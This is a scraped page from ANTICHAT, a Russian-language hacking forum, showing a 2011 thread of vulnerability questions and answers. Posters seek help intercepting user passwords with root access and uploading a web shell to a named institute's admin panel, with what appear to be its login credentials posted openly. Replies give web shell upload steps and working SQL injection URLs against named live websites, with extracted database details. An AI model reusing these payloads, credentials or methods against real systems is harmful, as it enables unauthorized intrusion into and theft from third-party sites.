FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1653 из 2422

1653

Опции темы

Поиск в этой теме

Опции просмотра

26.04.2011, 21:39

AppS

Познающий

Регистрация: 08.08.2009

Сообщений: 37

Провел на форуме:
162650

Репутация: 2

Отправить сообщение для AppS с помощью ICQ

Вопрос такого типа, как можно перехватить пороль(узнать) имея доступ на систему (root) FreeBSD 6.3, знаю есть хеш, но он не побираеться. уже 2 недели;( читал про затроянивания ssh, но он делает только доступ. Какие есть идет по перехвату пороля узера?

27.04.2011, 00:46

assinjeans

Guest

Сообщений: n/a

Провел на форуме:
5632

Репутация: 0

подскажите как сода залить шелл

http://ptb.ib-pan.krakow.pl/admin/index.php

ptb@obpan.pl

p162002b

плз

27.04.2011, 01:29

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

Цитата:

Сообщение от assinjeans

assinjeans said:
подскажите как сода залить шелл
http://ptb.ib-pan.krakow.pl/admin/index.php
ptb@obpan.pl
p162002b
плз

создай (где нить в новостях) html форму аплоада и пробуй через /admin/upLoad.php

или залей на http://ptb.ib-pan.krakow.pl/files/ .htaccess и пробуй другие расширение...

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

27.04.2011, 16:56

mr.celt

Участник форума

Регистрация: 06.02.2008

Сообщений: 110

Провел на форуме:
217423

Репутация: 32

функция mysql_connect

Наверно наивный вопрос, но все же...

Скрипт принимает данные и сразу же передает их функции mysql_connect().

По результатам ее работы устанавливается флаг об успешной или неуспешной авторизации. Можно ли в эту функцию что-то такое пихнуть (хотя бы теоретически), чтобы mysql_connect() вернула true? В 2006 году был сплоит по переполнению буфера в этой функции, но тут он не подходит.

28.04.2011, 14:30

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

//спецтема

https://forum.antichat.net/threadnav91666-1-10.html

29.04.2011, 12:20

vasykas

Guest

Сообщений: n/a

Провел на форуме:
173402

Репутация: 37

Возможно ли через PHPList шелл залить?

29.04.2011, 23:45

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12

выводимые поля не могу оприделить, допустим если в каждое поле вставить version() то сайт отоброжается, если поставить в 4 поле то выдает ошибку, как я понимаю там тока числовые значения проходят, подскажите ка дабить эту скуль если можно через четвертую колонку, а еще лудше где мануал по такому роду уязвимости почитать можно...

29.04.2011, 23:56

LiRvD082

Новичок

Регистрация: 04.10.2009

Сообщений: 1

Провел на форуме:
14740

Репутация: 0

Цитата:

Сообщение от None

вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12
выводимые поля не могу оприделить

Раскрутил как BLIND!

database(): awah

@@tmpdir: /tmp

version(): 5.1.53-log

@@version_compile_os: pc-linux-gnu

user(): awah@lapstop.com.br

@@basedir: /data/mysql/zehnder/

@@datadir: /dh/mysql/ze_nder/data/

30.04.2011, 00:12

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

Цитата:

Сообщение от winstrool

winstrool said:
вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12
выводимые поля не могу оприделить, допустим если в каждое поле вставить version() то сайт отоброжается, если поставить в 4 поле то выдает ошибку, как я понимаю там тока числовые значения проходят, подскажите ка дабить эту скуль если можно через четвертую колонку, а еще лудше где мануал по такому роду уязвимости почитать можно...

Код:

Code:
http://artwithaheart.us/pages.php?pid=5%20and%201=2+union+select+1,2,3,%280x3120616e6420313d3220756e696f6e2073656c65637420312c322c332c76657273696f6e2829202d2d2031%29,5,6,7,8,9,10,11,12

P.S. ну тебя же должно было смутить, что если ты пишешь в 4ое поле не число и тебе выдаёт ошибку mysql_fetch_array() то значит что этот параметр используется где-то ещё (для общего развития)

#10

01.05.2011, 13:39

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Не пойму как тут дальше выводить:

Цитата:

Сообщение от None

http://www.raarfm.com/shows/cinr_suite?id=-116'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103,104,105,106,107,108,109,110, 111,112,113,114,115,116,117,118,119,120,121,122,12 3,124,125,126,127,128,129,130,131,132+--+

Страница 1653 из 2422

1653

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ